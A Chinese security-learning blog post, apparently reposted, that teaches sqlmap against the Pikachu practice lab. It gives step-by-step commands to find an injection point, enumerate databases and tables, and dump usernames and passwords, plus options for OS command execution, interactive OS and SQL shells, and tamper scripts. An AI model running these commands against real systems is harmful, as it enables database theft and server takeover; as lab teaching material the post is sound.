【网络安全学习】SQL注入02：使用sqlmap进行注入

2024/10/25 14:22:30 来源：https://blog.csdn.net/oZuoGeQian/article/details/140954471 浏览: 次关键词：【网络安全学习】SQL注入02：使用sqlmap进行注入

1.sqlmap的基本功能

sqlmap的基本功能是对Web应用中的数据库进行自动化的检测、利用和攻击。

使用pikachu靶场进行sqlmap的基础功能使用。

1️⃣ 第一步：先检查是否有注入点：

# -u : 指定目标url，也就是指定注入点
sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2"

在这里插入图片描述

2️⃣ 第二步：再使用`--dbs`参数获取数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dbs
# --dbs : 读取数据库

在这里插入图片描述

3️⃣ 第三步：查看当前应用使用的数据库。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --current-db
# --current-db : 列出当前应用所用的数据库

在这里插入图片描述

4️⃣ 第四步：列出指定数据库的所有表。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --tables -D pikachu
# --tables : 获取数据库表
# -D : 指定数据库

在这里插入图片描述

5️⃣ 第五步：读取指定表中的字段名称。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --columns -T users -D pikachu
# --columns : 列取字段名

在这里插入图片描述

6️⃣ 第六步：读取指定字段内容。

sqlmap -u "http://192.168.187.132:8848/vul/sqli/sqli_str.php?name=zane&submit=%E6%9F%A5%E8%AF%A2" --dump -C level,password,username -T users -D pikachu
# --dump : 为转存数据
# -C : 指定字段名称
# -T : 指定表名
# -D : 指定数据库名称。

在这里插入图片描述

在读取数据后，SQLMap将会把读取的数据转存到**SQLMap/output/目录下，文件以“[Table名].cvs**”保存.
在这里插入图片描述

通过以上步骤便完成了一个正常SQL注入并读取数据库数据的流程。

2. sqlmap参数

2.1 测试注入点权限

# 测试所有用户的权限
sqlmap -u "[URL]" --privileges
# 测试sa用户权限
sqlmap -u "[URL]" --privileges -U sa

2.2 执行Shell命令

# 执行net user命令
sqlmap -u "[URL]" --os-cmd="net user"
# 系统交互的shell
sqlmap -u "[URL]" --os-shell

2.3 获取当前数据库名称

sqlmap -u "[URL]" --current-db

2.4 执行SQL命令

# 返回sql交互的shell，执行sql语句
sqlmap -u "[URL]" --sql-shell

在这里插入图片描述

2.5 POST提交方式

sqlmap -u "[URL]" --data "POST参数"

2.6 显示详细的等级信息

sqlmap -u "[URL]" --dbs -v 1
# -v参数包含以下7个等级。
# 0：只显示Python的回溯、错误和关键消息；
# 1：显示信息和警告消息；
# 2：显示调试消息；
# 3：有效载荷注入；
# 4：显示HTTP请求；
# 5：显示HTTP响应头；
# 6：显示HTTP响应页面的内容。

2.7 注入HTTP请求

sqlmap -r head.txt --dbs
# head.txt中是HTTP请求的头信息

head.txt的内容大致如下：

POST /login.php HTTP/1.1
Host:www.xxx.com
User-Agent:Mozilla/5.0
username=xxx&yyy=zzz

2.8 使用SQLMap插件

sqlmap -u "[URL]" -tamper "插件名.py"

SQLMap可以使用插件，插件都保存在SQLMap目录下的tamper文件夹中，如下图所示：
在这里插入图片描述

关于SQLMap详细的使用可以参考官方说明：

https://github.com/sqlmapproject/sqlmap/wiki/Usage

🌟 以上就是SQLMap的一些基础的使用说明。 🌟

【网络安全学习】SQL注入02：使用sqlmap进行注入

1.sqlmap的基本功能

1️⃣ 第一步：先检查是否有注入点：

2️⃣ 第二步：再使用`--dbs`参数获取数据库。

3️⃣ 第三步：查看当前应用使用的数据库。

4️⃣ 第四步：列出指定数据库的所有表。

5️⃣ 第五步：读取指定表中的字段名称。

6️⃣ 第六步：读取指定字段内容。

2. sqlmap参数

2.1 测试注入点权限

2.2 执行Shell命令

2.3 获取当前数据库名称

2.4 执行SQL命令

2.5 POST提交方式

2.6 显示详细的等级信息

2.7 注入HTTP请求

2.8 使用SQLMap插件

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

【网络安全学习】SQL注入02：使用sqlmap进行注入

1.sqlmap的基本功能

1️⃣ 第一步：先检查是否有注入点：

2️⃣ 第二步：再使用--dbs参数获取数据库。

3️⃣ 第三步：查看当前应用使用的数据库。

4️⃣ 第四步：列出指定数据库的所有表。

5️⃣ 第五步：读取指定表中的字段名称。

6️⃣ 第六步：读取指定字段内容。

2. sqlmap参数

2.1 测试注入点权限

2.2 执行Shel​l命令

2.3 获取当前数据库名称

2.4 执行SQL命令

2.5 POST提交方式

2.6 显示详细的等级信息

2.7 注入HTTP请求

2.8 使用SQLMap插件

相关资讯

热文排行

最新新闻

推荐新闻

热搜词

2️⃣ 第二步：再使用`--dbs`参数获取数据库。

2.2 执行Shell命令